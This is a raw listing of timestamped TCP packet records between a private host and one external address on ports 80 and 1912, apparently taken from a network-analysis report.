                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.059973955 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.090267897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.179785967 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.184741974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.184771061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.184858084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.185086012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.185195923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.185245991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.185965061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.186044931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.186098099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.186858892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.186981916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.187028885 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.187824965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.187850952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.187900066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.188663960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.188858032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.188973904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.189583063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.189708948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.189754009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.190371037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.190460920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.190516949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.191236973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.191282988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.191329002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.192172050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.192332983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.192379951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.193002939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.193147898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.193214893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.193896055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.194006920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.194051027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.194756031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.194863081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.194905996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.195650101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.195761919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.195815086 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.196609020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.196691990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.196737051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.197403908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.197561979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.197609901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.198275089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.198380947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.198512077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.199158907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.199265003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.199495077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.200079918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.200244904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.200378895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.200894117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.201020002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.201076984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.201787949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.201929092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.202033997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.202686071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.202811956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.202879906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.203615904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.203808069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.203859091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.204524040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.204667091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.204713106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.205312014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.205502987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.205554962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.206259012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.206372023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.206459045 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.207062960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.207182884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.207245111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.207951069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.207998037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.208049059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.208853960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.208920956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.208978891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.209703922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.209789038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.209851027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.210589886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.210736036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.210793972 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.211455107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.211574078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.211636066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.212332964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.212460995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.212524891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.213212967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.213344097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.213402987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.214122057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.214176893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.214234114 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.215130091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.215184927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.215370893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.215846062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.215992928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.216074944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.216698885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.216824055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.216913939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.217648029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.217683077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.217750072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.218456030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.218574047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.218626022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.219363928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.219418049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.219504118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.220201969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.220369101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.220686913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.221195936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.221250057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.221313953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.221976042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.222119093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.222207069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.222836018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.222887993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.222958088 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.223751068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.223876953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.223974943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.224621058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.224729061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.224782944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.225528002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.225581884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.225627899 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.226341963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.226538897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.226592064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.227216005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.227344036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.227413893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.228110075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.228235960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.228432894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.228970051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.229099989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.229212046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.229846954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.229923010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.229968071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.230719090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.277766943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.376966953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.377037048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.377160072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.377348900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.377465010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.378206015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.378268003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.378300905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.379112959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.379148960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.379179001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.379199028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.379983902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.380040884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.380094051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.380852938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.380939007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.381021023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.381726027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.381800890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.382663012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.382718086 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.382834911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.382890940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.383505106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.383599997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.383654118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.384358883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.384494066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.384560108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.385262012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.385375023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.386104107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.386154890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.386223078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.386631966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.386991024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.387126923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.387171030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.387873888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.388012886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.388056993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.388747931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.388792038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.388871908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.389656067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.389763117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.389925003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.390537977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.390691042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.391397953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.391458035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.391505003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.391836882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.392246008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.392364025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.393129110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.393182039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.393196106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.394057989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.394105911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.394125938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.394138098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.394926071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.395026922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.395076990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.395801067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.395925999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.395972967 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.396655083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.396780014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.396955967 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.397572041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.397703886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.397747993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.398437023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.398513079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.399271965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.399333000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.399370909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.399558067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.400139093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.400228977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.400268078 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.401015997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.401166916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.401218891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.402070045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.402116060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.402302980 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.402833939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.402945042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.402998924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.403670073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.403784990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.403837919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.404572010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.404599905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.404649973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.405419111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.405529976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.405606031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.406330109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.406413078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.406461000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.407196045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.407289028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.407445908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.408085108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.408216000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.408262968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.409008026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.409096956 CET8049723185.81.68.147192.168.2.10
